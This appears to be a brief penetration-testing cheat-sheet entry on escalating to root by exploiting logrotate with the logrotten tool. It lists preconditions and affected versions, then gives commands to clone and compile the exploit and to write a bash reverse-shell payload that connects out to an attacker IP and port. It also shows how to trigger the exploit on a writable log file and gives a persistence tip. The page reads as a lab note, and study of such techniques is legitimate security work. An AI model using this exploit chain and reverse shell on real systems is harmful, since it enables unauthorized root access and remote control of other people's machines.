Logrotate
To exploit logrotate, we need some requirements that we have to fulfill.
we need
writepermissions on the log fileslogrotate must run as a privileged user or
rootvulnerable versions:
3.8.6
3.11.0
3.15.0
3.18.0
Version
$ logrotate --version
logrotate 3.11.0Logrotten
$ git clone https://github.com/whotwagner/logrotten.git
$ cd logrotten
$ gcc logrotten.c -o logrotten
echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payloadWhich option logrotate uses
$ grep "create\|compress" /etc/logrotate.conf | grep -v "#"
create
./logrotten -p ./payload /tmp/tmp.logExample
2 access.log writable

Run exploit and trigger logrotate by writing on file
htb-student@ubuntu:~/backups$ echo 'f*' > access.log
For persistance: /bin/dash -p

Also possible to create a root user and log in with it. See references
Resources
Last updated
